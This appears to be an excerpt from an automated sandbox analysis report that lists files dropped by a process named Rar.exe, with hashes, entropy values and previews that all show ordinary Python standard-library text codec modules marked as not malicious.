                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1066
                                                                                                                                                                                      Entropy (8bit):4.554621344303813
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:nB6q6Oz+f/Xo11ZKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9jcJxFpz:oq3P11t62VJjRU8njOxLnrxLbrLK+Jx/
                                                                                                                                                                                      MD5:72F02C10927F33B52DF6549FF1F52E60
                                                                                                                                                                                      SHA1:6C666F6A4C36D0C3CBD944216E170E26D7B5D91A
                                                                                                                                                                                      SHA-256:2B5573EBF7FDC20DCF126633ADF0B7283C08629D36DBEFA669C985C9DDB98EA7
                                                                                                                                                                                      SHA-512:F7F0D5C10490026F0809714BEED7CB2F5AB284C7BDC05BCBDF7C690A255DBA59F815B5524D88F5ED35CD6FD668C93695126EF7153CCBFA5B58BAA5E151839C51
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#..# gb2312.py: Python Unicode Codec for GB2312..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_cn, codecs..import _multibytecodec as mbc....codec = _codecs_cn.getcodec('gb2312')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='gb2312',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. strea
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1054
                                                                                                                                                                                      Entropy (8bit):4.504465163109839
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:nBOEpqNOz+f/Xo1SKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9scJxFV:4Epq2P1k62VJjRU8njOxLnrxLbrLKPJd
                                                                                                                                                                                      MD5:0D6CF4D6FFFB4B761BEBCEBC1D2C3CF3
                                                                                                                                                                                      SHA1:64C7CD7A46E8CAE1CB9F0700035CA6BD2EC73C76
                                                                                                                                                                                      SHA-256:9C7828E3B9661E39D4D75419A12B9D132FA9D0B4DAEC36F3DF51AD1C3A638DE3
                                                                                                                                                                                      SHA-512:0F4F577C2FB46AB6B6D8DD6CFB5F89C8748F67E864D9AB6E3D92904BB0AE9EDB6239CABDF8A8F9B11238EEB60870EB819499B4A942E2D3B5CB7032F444246FCF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#..# gbk.py: Python Unicode Codec for GBK..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_cn, codecs..import _multibytecodec as mbc....codec = _codecs_cn.getcodec('gbk')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='gbk',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=Stre
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1563
                                                                                                                                                                                      Entropy (8bit):4.660866418659877
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:Xtc/QX1AIgs1AIc1wX1euM8ivIvPTKs3ntJxHjH:XS/QX/gs/cmX8uAA3TKsdrH
                                                                                                                                                                                      MD5:1E55C95602534092B4DB3ED99CB9E67C
                                                                                                                                                                                      SHA1:D1DBA179C7F3B0FF22D4F1713275D0C48637BB48
                                                                                                                                                                                      SHA-256:5881C1AEEEB5F9CD27CE0E0E62AB9D6551F094955DBD52DC8184165DAF78AEBA
                                                                                                                                                                                      SHA-512:84DACC6B4CBFBB99D7D6F0124EF1E7B26035C7249730EB1C185B60A750DE2548CA60E8A939DF8445D5DDDF1F8D397708A264D9FD7771C674C7DA889C306C9D93
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Python 'hex_codec' Codec - 2-digit hex content transfer encoding.....This codec de/encodes from bytes to bytes.....Written by Marc-Andre Lemburg (mal@lemburg.com)..."""....import codecs..import binascii....### Codec APIs....def hex_encode(input, errors='strict'):.. assert errors == 'strict'.. return (binascii.b2a_hex(input), len(input))....def hex_decode(input, errors='strict'):.. assert errors == 'strict'.. return (binascii.a2b_hex(input), len(input))....class Codec(codecs.Codec):.. def encode(self, input, errors='strict'):.. return hex_encode(input, errors).. def decode(self, input, errors='strict'):.. return hex_decode(input, errors)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. assert self.errors == 'strict'.. return binascii.b2a_hex(input)....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. assert self.errors == 'strict'..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13789
                                                                                                                                                                                      Entropy (8bit):4.607934099089844
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:zbhsuOTDvRFUrXPLouhIAs2+ijLoM69Ne/DD6e:STjuhIAlgM6G6e
                                                                                                                                                                                      MD5:1332CCB5750EB756B2856CCAD9E18CC1
                                                                                                                                                                                      SHA1:ACDBF93730FB0420EA5B77AFE7E3282669829EF4
                                                                                                                                                                                      SHA-256:681FF6A2273BD64450E04FC6F04B2EC63015A91490E30A31E25ED193708C99D4
                                                                                                                                                                                      SHA-512:6F43760A54CB494E48B8C9A659505727246AEAF539AD4A35AFE6F4F5D0E4A84C2F5F0ED5055794DE2D575E78D5A5D1497EB795F35D8F5533DF955587EBC38FD4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec generated from 'hp_roman8.txt' with gencodec.py..... Based on data from ftp://dkuug.dk/i18n/charmaps/HP-ROMAN8 (Keld Simonsen).... Original source: LaserJet IIP Printer User's Manual HP part no.. 33471-90901, Hewlet-Packard, June 1989..... (Used with permission)...."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.Strea
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1050
                                                                                                                                                                                      Entropy (8bit):4.49858978606931
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:nvpqxOz+f/Xo1cZKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9ecJxFpz:vpqyP1ct62VJjRU8njOxLnrxLbrLK5Jd
                                                                                                                                                                                      MD5:78235EEDFAE419F3CC13044D7890799B
                                                                                                                                                                                      SHA1:5BF1944AC39D99B3777CCD61DB7FAE3FF0D3E936
                                                                                                                                                                                      SHA-256:2601DC6EF938FF87BD2024B3C4785254F2B3DD4D8D34D8F63E254D7B8545B077
                                                                                                                                                                                      SHA-512:F5B7383FC8CBBAA13E8D101DD264D0F7952CD3A681F6746B5D941381A7CD39BE808D3E15375CF3778AC80D026658D494FA410CE1904683BD873D91C55DA9CA41
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#..# hz.py: Python Unicode Codec for HZ..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_cn, codecs..import _multibytecodec as mbc....codec = _codecs_cn.getcodec('hz')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='hz',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=StreamRe
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9405
                                                                                                                                                                                      Entropy (8bit):4.456033241276571
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:g2wxhP5XBQ/J/8V2zbxofjEY7pKrlIRYUnIzSGAy4DYvRv3:gPvPjp2zbIbwDcGx
                                                                                                                                                                                      MD5:C2DAEBCCD1DE0B4535D537DB6658A6AA
                                                                                                                                                                                      SHA1:B799688CC2CFDA6164308A6A78DF70AD59876DB7
                                                                                                                                                                                      SHA-256:F62053A41EEA93F5953D1DE69C98FFD7F3E2D0E9AC984BA27A9BE37ADF0F4022
                                                                                                                                                                                      SHA-512:83C7224EB66F7B4AD23B678B74EE054C27D8197EE708D5CCCFC4FA9E1775978608E09AA188594C5602160F93215C4F7B113C0C593C39502FA3CB163744DDAA54
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# This module implements the RFCs 3490 (IDNA) and 3491 (Nameprep)....import stringprep, re, codecs..from unicodedata import ucd_3_2_0 as unicodedata....# IDNA section 3.1..dots = re.compile("[\u002E\u3002\uFF0E\uFF61]")....# IDNA section 5..ace_prefix = b"xn--"..sace_prefix = "xn--"....# This assumes query strings, so AllowUnassigned is true..def nameprep(label):.. # Map.. newlabel = [].. for c in label:.. if stringprep.in_table_b1(c):.. # Map to nothing.. continue.. newlabel.append(stringprep.map_table_b2(c)).. label = "".join(newlabel).... # Normalize.. label = unicodedata.normalize("NFKC", label).... # Prohibit.. for c in label:.. if stringprep.in_table_c12(c) or \.. stringprep.in_table_c22(c) or \.. stringprep.in_table_c3(c) or \.. stringprep.in_table_c4(c) or \.. stringprep.in_table_c5(c) or \.. stringprep.in_table_c6(c) or \.. stringprep.in_table_c7(c) or
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1092
                                                                                                                                                                                      Entropy (8bit):4.599723694318225
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:n9qdOz0f/XojmKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9ecJxFplR:9qmFU62VJjRU8njOxLnrxLbrLKZJxTz
                                                                                                                                                                                      MD5:0607F8E6310A0B601897FF8EC76FF2C4
                                                                                                                                                                                      SHA1:3839A936E2792722D3F157F11965BF510241C0FA
                                                                                                                                                                                      SHA-256:7169767DD6732A80A0B665315588EF9CFF2DF4D495A86BC0BDD22B5C9F0644B9
                                                                                                                                                                                      SHA-512:C763E0D3AFA5DBB7FA96D03A52F0F5828A61E8FF24523BF62A852C989DD3BFBBFC3DA4535B5401A78E47FE16F3EA33364BA63655D91A6A12516315E231F23B15
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#..# iso2022_jp.py: Python Unicode Codec for ISO2022_JP..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_jp')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_jp',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=Incremen
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1100
                                                                                                                                                                                      Entropy (8bit):4.625134249310359
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:nhq1Oz0f/XojglKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9CcJxFplR:hquF8J62VJjRU8njOxLnrxLbrLK5JxTz
                                                                                                                                                                                      MD5:4D2B0675DE1A9AFB3553B5D5E894020C
                                                                                                                                                                                      SHA1:A9B6F704D09F7A0B5182BE7C3581D321BA4DDA76
                                                                                                                                                                                      SHA-256:627D3BDB5D3BC70DD00E51199B689D1C225EFE747A2DB8D5938E6AF78263F572
                                                                                                                                                                                      SHA-512:AC8E08AA4A2235BF20C563EC1A466B666A39F09CCD4AE681CD34DCF51754E3B8C860D557354691D170ABCDE43029B3B45E5597AADDED398577F9A90C74FADC57
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#..# iso2022_jp_1.py: Python Unicode Codec for ISO2022_JP_1..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_jp_1')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_jp_1',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1100
                                                                                                                                                                                      Entropy (8bit):4.611453480597579
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:nnSqgOz0f/Xoj7ZKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9VcJxFpz:nSq5F3t62VJjRU8njOxLnrxLbrLK0Jx/
                                                                                                                                                                                      MD5:A4798D8B5DEE38BCCF3CBEAD235F392E
                                                                                                                                                                                      SHA1:8971456D5A2C4A3255592399EE1141E119880774
                                                                                                                                                                                      SHA-256:DC680A0E34DCE73756F0E3B5CBB23DD819022BE7E10F80E55289A5EAB9ED7C2E
                                                                                                                                                                                      SHA-512:E329124E3ADA51C303556CA0C6B5B4644ED76E6F43C943BFE72F318928EF1DAA6121FE545480F4092F92B05CD25315D3E5B7ADB09E63985E9D8879BA3A751C2B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#..# iso2022_jp_2.py: Python Unicode Codec for ISO2022_JP_2..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_jp_2')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_jp_2',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1112
                                                                                                                                                                                      Entropy (8bit):4.645190214359865
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:n8q1sOz0f/XojvKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9FcJxFplR:8qnF/62VJjRU8njOxLnrxLbrLKoJxTz
                                                                                                                                                                                      MD5:E1738D28D315C80A04908CDB21CBE7BD
                                                                                                                                                                                      SHA1:D79BC1E83E0A2103909A7AB97DB3A456D21C0711
                                                                                                                                                                                      SHA-256:C8CB592DF0CF38A6B7E8265C02D7784FB32052EF9AD94D0FF369889EDA540273
                                                                                                                                                                                      SHA-512:BFDF5D44B36916C3B828EA1C599E644CB9D3ADBC0D2D4922F016F9DDD7EB424F8A937C19FA3EFBA0E9F4AC14ADFF3C0BA6B924130ED2D050C3A9BDDC2F4165C2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#..# iso2022_jp_2004.py: Python Unicode Codec for ISO2022_JP_2004..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_jp_2004')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_jp_2004',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. increme
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1100
                                                                                                                                                                                      Entropy (8bit):4.625134249310359
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:nrq3Oz0f/XojUKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9IcJxFplR:rqkFa62VJjRU8njOxLnrxLbrLKnJxTz
                                                                                                                                                                                      MD5:3E98055A4B7D99A49798F3012C4D9DDB
                                                                                                                                                                                      SHA1:8579E49AA8080610BF40A51DC18B6DF5EEE56A2E
                                                                                                                                                                                      SHA-256:2A2AE4368D962C2E7B5DB2F29EE89EFD5A7FDB881DEF523C21670E0D1A1C50CE
                                                                                                                                                                                      SHA-512:DBA054816FC0022810D545D089BC62997BFE04143B579E59EF1DAD2D25DCAFC879BF00CADEA2DDF3CE850728E00911984590EA8C8C8D6EA1AF30F71AA97CEA76
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#..# iso2022_jp_3.py: Python Unicode Codec for ISO2022_JP_3..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_jp_3')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_jp_3',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1108
                                                                                                                                                                                      Entropy (8bit):4.633181613509048
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:npqNOz0f/XojaKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9ycJxFplR:pq2Fg62VJjRU8njOxLnrxLbrLK5JxTz
                                                                                                                                                                                      MD5:34E904E0F16F84EC0A001DFFCDE7514C
                                                                                                                                                                                      SHA1:19BCD8776FB3239A003F4B5F04B7056B81D0A6C6
                                                                                                                                                                                      SHA-256:5B4439C7DBE65638166A70C5404CABB72552019D1F497193C6689B86BD3C4C94
                                                                                                                                                                                      SHA-512:F9DC1EA03840BD9763BC2B1521D2557FD0111682D1FF805FCCDA123508C3F23768F819FA26B2E097447595F70ABCB2737C9B153B848D2687DB3E2E9E645801EC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#..# iso2022_jp_ext.py: Python Unicode Codec for ISO2022_JP_EXT..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_jp_ext')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_jp_ext',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incremental
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1092
                                                                                                                                                                                      Entropy (8bit):4.584383388529371
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:nJIBqqOz0f/XojfKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9ncJxFpz:EqHFn62VJjRU8njOxLnrxLbrLKGJxTz
                                                                                                                                                                                      MD5:F907851FF35FB61EB485B2C163A2BCCB
                                                                                                                                                                                      SHA1:CA280AC9C832208B01242601F7F3A78803A1CDF9
                                                                                                                                                                                      SHA-256:FD9EFD7094361F6557D00857E332D7229E922597336A0714FB0FA2402C954029
                                                                                                                                                                                      SHA-512:4992572D79613856F84F7332C1D7C588B2BA4256613FCAB21BEF6C74BF8D50F2D96CAA2ABFF2C92D040DDFE45A328B7495BCB29CD51580577D5F5A5527CC469D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#..# iso2022_kr.py: Python Unicode Codec for ISO2022_KR..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_kr')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_kr',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=Incremen
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13483
                                                                                                                                                                                      Entropy (8bit):4.571059193460173
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:qHhsuOTDvRAUrXPLouhIAs2+ijLMZt6CJTd12:HTauhIAlEZt680
                                                                                                                                                                                      MD5:0466703A1EB5752CDD5115B2D738D822
                                                                                                                                                                                      SHA1:03354F0D1406A99B9934276675759C6002D4A901
                                                                                                                                                                                      SHA-256:CCFDBA207B483DCD38673D85B6E2A773A5BF64E8AE9DB7E90A01F8014E62B24A
                                                                                                                                                                                      SHA-512:3D7B957FF194B69AC9DE7FE59BD03DB29EBD076456FC93FD3E6AFB6B09EACB8C5D327A6E17719C02AE5F71E8428BB55FAB633955861699BC4FF90C3F80D0A783
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec iso8859_1 generated from 'MAPPINGS/ISO8859/8859-1.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-1',.. encode
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13896
                                                                                                                                                                                      Entropy (8bit):4.591898710758108
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:OHhsuOTDvR4UrXPLouhIAs2+ijLWDf6z6iC:bTmuhIAleu+
